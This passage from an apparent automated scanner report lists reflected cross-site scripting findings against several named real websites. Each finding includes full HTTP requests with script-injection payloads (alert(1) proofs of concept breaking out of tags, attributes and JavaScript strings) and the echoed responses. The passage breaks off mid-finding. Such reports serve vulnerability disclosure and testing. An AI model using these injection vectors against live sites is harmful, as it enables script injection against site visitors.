Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ceec1<img%20src%3da%20onerror%3dalert(1)>73991205269 was submitted in the REST URL parameter 3. This input was echoed as ceec1<img src=a onerror=alert(1)>73991205269 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GGceec1<img%20src%3da%20onerror%3dalert(1)>73991205269/7008/25529/language%3Aen%3Bcountry%3AUS%3B?cc=0.3572320435196161 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:16 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 82

// noop: d: [AENDU0IN29GGceec1<img src=a onerror=alert(1)>73991205269,7008,25529]

4.96. http://cgiwsc.enhancedsitebuilder.com/cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgiwsc.enhancedsitebuilder.com
Path:   /cgix/AppLoader.cls/AENDU0IN29GG/7008/25529/language%3Aen%3Bcountry%3AUS%3B

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a202b<img%20src%3da%20onerror%3dalert(1)>38bb7ff743d was submitted in the REST URL parameter 4. This input was echoed as a202b<img src=a onerror=alert(1)>38bb7ff743d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /cgix/AppLoader.cls/AENDU0IN29GG/7008a202b<img%20src%3da%20onerror%3dalert(1)>38bb7ff743d/25529/language%3Aen%3Bcountry%3AUS%3B?cc=0.3572320435196161 HTTP/1.1
Host: cgiwsc.enhancedsitebuilder.com
Proxy-Connection: keep-alive
Referer: http://www.managedfuturespecialist.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:07:29 GMT
Server: Apache/2.0.63 (Debian) CM4all-ModComa/1.1(libcoma/2.6.13) JETServ/2.2.25 mod_jk2/2.0.4 mod_apreq2-20051231/2.6.0
Cache-Control: must-revalidate
P3P: CP="NOI COR CURa INT"
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 58

// noop: 7008a202b<img src=a onerror=alert(1)>38bb7ff743d

4.97. http://da.newstogram.com/hg.php [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 19af2<script>alert(1)</script>e16d4149e4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.completed19af2<script>alert(1)</script>e16d4149e4 HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:41 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:41 GMT; domain=.newstogram.com
Content-Length: 162

Newstogram.completed19af2<script>alert(1)</script>e16d4149e4({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

4.98. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://da.newstogram.com
Path:   /hg.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d7111<script>alert(1)</script>14f91b7e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hg.php?uid=71B0F849-022F-4968-92AC-BCEBD92ACB74&k=cdf74d8e9f86d84da565a74135adf113&s=http%3A//www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html&r=0&q=0&e=2&cid=&callback=Newstogram.compl/d7111<script>alert(1)</script>14f91b7e83eted HTTP/1.1
Host: da.newstogram.com
Proxy-Connection: keep-alive
Referer: http://www.bloomberg.com/news/2011-05-05/pingpong-returns-with-partners-from-sarandon-to-elle-to-hedge-fund-match.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Thu, 12 May 2011 11:37:47 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/5.3.3
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate
Set-Cookie: DMUserTrack=896A200B-7889-4691-9DB7-6D96659E63C7; expires=Fri, 11-May-2012 11:37:47 GMT; domain=.newstogram.com
Content-Length: 163

Newstogram.compl/d7111<script>alert(1)</script>14f91b7e83eted({"Histogram":{"status":"saved","uid":"896A200B-7889-4691-9DB7-6D96659E63C7","ip":"173.193.214.243"}})

4.99. http://dealbook.nytimes.com/category/main-topics/mergers-acquisitions/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/mergers-acquisitions/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f31"><script>alert(1)</script>d4e86dd7255 was submitted in the REST URL parameter 2. This input was echoed as e7f31\"><script>alert(1)</script>d4e86dd7255 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topicse7f31"><script>alert(1)</script>d4e86dd7255/mergers-acquisitions/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; nyt-m=D30DFD30595EF4324E4B50EE62114094&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.10.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305198204263:ss=1305198204263; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.2.10.1305198192; _chartbeat2=gi367p67ehp7835r; adxcl=t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:16:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topicse7f31\"><script>alert(1)</script>d4e86dd7255/mergers-acquisitions&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle
...[SNIP]...

4.100. http://dealbook.nytimes.com/category/main-topics/private-equity/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/private-equity/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f84c"><script>alert(1)</script>e1de8e2eba6 was submitted in the REST URL parameter 2. This input was echoed as 5f84c\"><script>alert(1)</script>e1de8e2eba6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topics5f84c"><script>alert(1)</script>e1de8e2eba6/private-equity/ HTTP/1.1
Host: dealbook.nytimes.com
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=27fdc70e4ff84dbef4b4b43a; news_people_toolbar=NO; nyt-recmod=1; nyt-nofb=0; __utmz=69104142.1305112069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=69104142.1451073784.1305112061.1305112061.1305112061.1; UserPersNYTRS=RecentLastSearch=/sales/new-york-ny-usa/1000000-99000000-price&RecentSearch=For+Sale_New+York_NY_%241%2c000%2c000-%2499%2c000%2c000%5e%2fsales%2fnew-york-ny-usa%2f1000000-99000000-price; NYTMapState=MapState=map_default; __utmz=30321962.1305198204.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=30321962.1644030145.1305198192.1305198192.1305198192.1; __utmc=30321962; __utmb=30321962.6.10.1305198192; adxcl=l*247c7=4f24d24f:1|t*26edd=4e32303f:1305112022; adxcs=si=0:1|s*23645=0:1|s*1935f=0:1|s*18a4b=0:1|s*1780a=0:1|s*2554b=0:1; nyt-m=A61A961B774C8275E676733D3F0E8B0E&e=i.1306900800&t=i.20&v=i.1&l=l.15.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1304360120&vr=l.4.1.0.0.0&pr=l.4.12.0.0.0&vp=i.0&gf=l.20.313598328.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; rsi_segs=D08734_70008|D08734_70010|D08734_70118|D08734_70613|D08734_72078|H07707_11017|H07707_11018|H07707_11028|H07707_11029|H07707_11030|H07707_11031|H07707_11044|H07707_11048|H07707_10638; _chartbeat2=gi367p67ehp7835r; WT_FPC=id=173.193.214.243-4039295808.30148852:lv=1305200199902:ss=1305198204263

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topics5f84c\"><script>alert(1)</script>e1de8e2eba6/private-equity&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left
...[SNIP]...

4.101. http://dealbook.nytimes.com/category/main-topics/venture-capital/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dealbook.nytimes.com
Path:   /category/main-topics/venture-capital/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe83"><script>alert(1)</script>aec22f4a558 was submitted in the REST URL parameter 2. This input was echoed as dbe83\"><script>alert(1)</script>aec22f4a558 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/main-topicsdbe83"><script>alert(1)</script>aec22f4a558/venture-capital/ HTTP/1.1
Host: dealbook.nytimes.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/12/takeda-in-talks-to-buy-nycomed-for-up-to-14-billion/
Cookie: RMID=0f2ce1bc50c84dca6d901646; nyt-m=FADD01C96E4F27CAA76E2D598CDA52BE&e=i.1306900800&t=i.20&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.2&g=i.0&er=i.1305111957&vr=l.4.0.0.0.0&pr=l.4.16.0.0.0&vp=i.0&gf=l.20.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1; nyt-recmod=1; nyt-nofb=0; WT_FPC=id=173.193.214.243-1926640512.30150603:lv=1305199637269:ss=1305199567634; rsi_segs=D08734_70010|D08734_70105|H07707_11028|H07707_11029|H07707_11044|H07707_11048; news_people_toolbar=NO; __utma=30321962.1192182855.1305199567.1305199567.1305199567.1; __utmb=30321962.4.10.1305199567; __utmc=30321962; __utmz=30321962.1305199567.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/0; _chartbeat2=qu8esf0gap8ovzzw; adxcs=s*192f7=0:1

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:27:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://dealbook.nytimes.com/xmlrpc.php
Cneonction: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 80586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/dealbook/category/main-topicsdbe83\"><script>alert(1)</script>aec22f4a558/venture-capital&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Lef
...[SNIP]...

4.102. http://ds.addthis.com/red/psi/sites/www.csscorp.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.csscorp.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f3a5c<script>alert(1)</script>fa005dc8a42 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.csscorp.com/p.json?callback=_ate.ad.hprf3a5c<script>alert(1)</script>fa005dc8a42&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.csscorp.com%2F&ffv352 HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305201657.1OD|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 131
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:10:14 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:10:14 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:10:14 GMT
Connection: close

_ate.ad.hprf3a5c<script>alert(1)</script>fa005dc8a42({"urls":[],"segments" : [],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.103. http://ds.addthis.com/red/psi/sites/www.elawmarketing.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.elawmarketing.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload dd5d7<script>alert(1)</script>da1a969282b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.elawmarketing.com/p.json?callback=_ate.ad.hprdd5d7<script>alert(1)</script>da1a969282b&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.elawmarketing.com%2Fabout%2Fclients&ref=http%3A%2F%2Fwww.elawmarketing.com%2F&149tj8h HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%7D..1305200976.1FE|1305200976.60; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 227
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 12:00:58 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 12:00:58 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200976.1FE|1305201658.1OD|1305200976.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 12:00:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 12:00:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 12:00:58 GMT
Connection: close

_ate.ad.hprdd5d7<script>alert(1)</script>da1a969282b({"urls":["http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3"],"segments" : ["1OD"],"loc": "MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg=="})

4.104. http://ds.addthis.com/red/psi/sites/www.pomerantzlaw.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.pomerantzlaw.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7f299<script>alert(1)</script>34209919e93 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.pomerantzlaw.com/p.json?callback=_ate.ad.hpr7f299<script>alert(1)</script>34209919e93&uid=4dc048d9159e4ae3&url=http%3A%2F%2Fwww.pomerantzlaw.com%2Fattorneys.html&ref=http%3A%2F%2Fwww.pomerantzlaw.com%2Fcontact-us.html&1mrdgam HTTP/1.1
Host: ds.addthis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: uid=4dc048d9159e4ae3; psc=4; loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=1304431085.60|1304431085.1OD|1304431085.1FE; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 457
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Thu, 12 May 2011 11:49:37 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sat, 11 Jun 2011 11:49:37 GMT; Path=/
Set-Cookie: di=%7B%7D..1305200977.1FE|1305200977.1OD|1305200977.60; Domain=.addthis.com; Expires=Sat, 11-May-2013 11:49:36 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Thu, 12 May 2011 11:49:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 12 May 2011 11:49:37 GMT
Connection: close

_ate.ad.hpr7f299<script>alert(1)</script>34209919e93({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dc048d9159e4ae3","http://xcdn.xgraph.net/15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3","http://cspix.media6degrees.com/orbser
...[SNIP]...

4.105. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3f80'%3balert(1)//cf614ca88fe was submitted in the mpck parameter. This input was echoed as f3f80';alert(1)//cf614ca88fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592f3f80'%3balert(1)//cf614ca88fe&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:01 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6890
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592f3f80';alert(1)//cf614ca88fe" target="_blank">
...[SNIP]...

4.106. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

